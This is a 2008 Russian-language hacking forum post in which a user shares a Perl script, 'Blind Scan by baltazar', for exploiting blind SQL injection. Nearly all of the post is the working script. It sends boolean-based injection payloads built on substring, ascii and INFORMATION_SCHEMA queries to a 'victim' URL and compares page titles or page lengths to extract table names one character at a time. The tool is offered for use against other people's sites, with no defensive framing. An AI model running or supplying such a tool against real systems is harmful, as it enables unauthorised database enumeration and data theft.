Blind Scan by baltazar

Discussion in 'PHP' started by OptimaPrime, 7 Jul 2008.

  1. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    310
    Likes Received:
    588
    Reputations:
    -61
    Эммм.мои скромные начинания в перле,здравая критика воспрнимается

    Собственно тулза для работы со слепыми иньекциями,а именно для подбора имен таблиц

    Code:
     
    #!/usr/bin/perl 
    use LWP::Simple; 
    use LWP::UserAgent; 
    my $userAgent = LWP::UserAgent->new; 
    my $titleok ; 
    my $done   = 1; 
    my $server = $ARGV[0]; 
    my $typequery = $ARGV[1]; 
    my $typerror= $ARGV[2]; 
     
    usage(); 
    if (!$server) { die "Read Usage!\n"; } 
    if (!$typequery ) { die "Read Usage!\n"; } 
     
    print $typequery; 
     
    if ($typequery==1) {$querysql = "select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+where+table_schema=database()";} 
    else {$querysql = "select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES";} 
     
    print"\n[x]Connecting: \n\t$server ..."; 
     
    my $Attackok= $userAgent->get($server."+and+substring(version(),1,1)=4"); 
    if($Attackok->is_success){ 
    	my $contentok = $Attackok->content; print " Connected and Saved \n"; 
           $titleok = get_content($contentok);} 
    else {   print " Connection Failed\nDone"; exit; } 
     
    print "[x]Length And Data Information Tables... :\n "; 
    my $Countertable = 65; 
    my $title; 
     
    while($done) 
    { 
     my $lengthCounter = 1; 
     my $val=0; 
     while($val!=1 && $lengthCounter<50) 
     { 
        my $content = get($server."+and+LENGTH((".$querysql."+limit+".$Countertable.",1))=".$lengthCounter); 
        $title = get_content($content); 
        #print("\ntable leng:".$title."-".$titleok."-".$lengthCounter."-".$val); 
        if($title != $titleok) 
          {  $val=1; 
     	  print "\n\t[$Countertable] ($lengthCounter)"; 
             print $tablename = blind_table_name($Countertable,$lengthCounter); 
    	  blind_column_name($tablename); 
          } 
        else { $lengthCounter++; } 
     } 
     
     if ($lengthCounter>=50) { $done=0; } 
     $Countertable++; 
    } 
     
    print "\n\n"; 
    print "[x]End... \n "; 
     
    ###################################################################################################### 
    sub blind_table_name { 
    	my $res    = undef; 
    	my $i      = 0; 
    	my $val2    = 1; 
    	my @cset   =  (48..57,95,97..122); 
    	my $titles = 0; 
     
         	while($val2<=$_[1] && $i <= $#cset) 
          { 
                  my $content1 = get($server."+and+ascii(substring((".$querysql."+limit+".$_[0].",1),".$val2.",1))=".$cset[$i]); 
    		$titles = get_content($content1); 
    	     if($titles != $titleok ) { 
    			 $res .= chr($cset[$i]); $val2++; $i = 0;} 
     	     else { $i++; } 
    	} 
    	return $res; 
    } 
     
    ###################################################################################################### 
    sub blind_column_name { 
     
    # come soon 
     
    } 
    ###################################################################################################### 
    sub get_content(){ 
     
    if ($typerror == 1) { 
     if ($_[0] =~ m/<title>(.*)<\/title>/) 
       {  return length($1);} 
     else {return 0; } 
    } 
    else { return length($_[0]); } 
    } 
    ###################################################################################################### 
    sub ascii_to_hex ($) 
    { 
        	(my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg; 
        	return $str; 
    } 
    ###################################################################################################### 
    sub usage() 
    { 
        print q 
        { 
        ################################################################### 
            Blind Scan      by baltazar 
           Usage: blinqsql.pl [Server] [Table] [Type Error] 
    	  [Serveur] : Url Victime Site with True id / 
    	  [Table]   : table site 1 , all table 2 
    	  [Type Error] : By title 1 , By allsize 2 
        ################################################################### 
        }; 
     
    } 
    ######################################################################################################
     
    2 people like this.
Loading...
Similar Threads - Blind Scan baltazar
  1. wizzer
    Replies:
    2
    Views:
    1,501
  2. scorpic393
    Replies:
    1
    Views:
    1,777
  3. freelsd
    Replies:
    1
    Views:
    2,287